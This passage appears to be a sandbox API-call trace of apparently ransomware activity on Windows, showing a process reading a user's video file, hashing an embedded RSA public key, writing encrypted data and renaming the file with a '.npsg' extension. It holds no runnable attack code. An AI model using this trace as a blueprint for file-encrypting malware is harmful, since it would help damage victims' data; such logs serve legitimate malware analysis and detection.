Flags=0x0, Size=0xc) returned 0x3b88f88 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f40 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88f28 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0240.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0240.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0240.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.888] GetCurrentThreadId () returned 0x5b4 [0240.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b89e98 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.889] GetCurrentThreadId () returned 0x5b4 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0240.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f28 [0240.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0240.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0240.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f40 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fa0 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f70 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f58 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fb8 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f58 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0240.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f28 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0240.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0240.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f970 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.894] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x16dda, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x16dda, lpOverlapped=0x0) returned 1 [0240.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0240.895] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16ddf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.895] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0240.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0240.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0240.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.895] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0240.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.896] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.896] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.896] CloseHandle (hObject=0x644) returned 1 [0240.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b8bcd0 [0240.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393c58 | out: hHeap=0x620000) returned 1 [0240.898] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BCU1g3YN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bcu1g3yn.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BCU1g3YN.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bcu1g3yn.mkv.npsg")) returned 1 [0240.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0240.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.899] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0240.900] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ac2240, ftCreationTime.dwHighDateTime=0x1d5b917, ftLastAccessTime.dwLowDateTime=0x2f5b9070, ftLastAccessTime.dwHighDateTime=0x1d5c4f1, ftLastWriteTime.dwLowDateTime=0x2f5b9070, ftLastWriteTime.dwHighDateTime=0x1d5c4f1, nFileSizeHigh=0x0, nFileSizeLow=0x14c67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dTx9f.mkv", cAlternateFileName="")) returned 1 [0240.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x33b8188 [0240.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0240.901] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\dTx9f.mkv") returned=".mkv" [0240.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\dTx9f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\dtx9f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.901] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=85095) returned 1 [0240.901] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.904] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14c41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.904] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.906] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.906] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14c67, lpOverlapped=0x0) returned 1 [0240.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.908] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.908] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.909] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.909] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.909] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.909] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.909] GetLastError () returned 0x0 [0240.909] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.909] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.909] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.909] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.909] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14c70) returned 0x3b95d50 [0240.910] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0240.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f970 [0240.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) 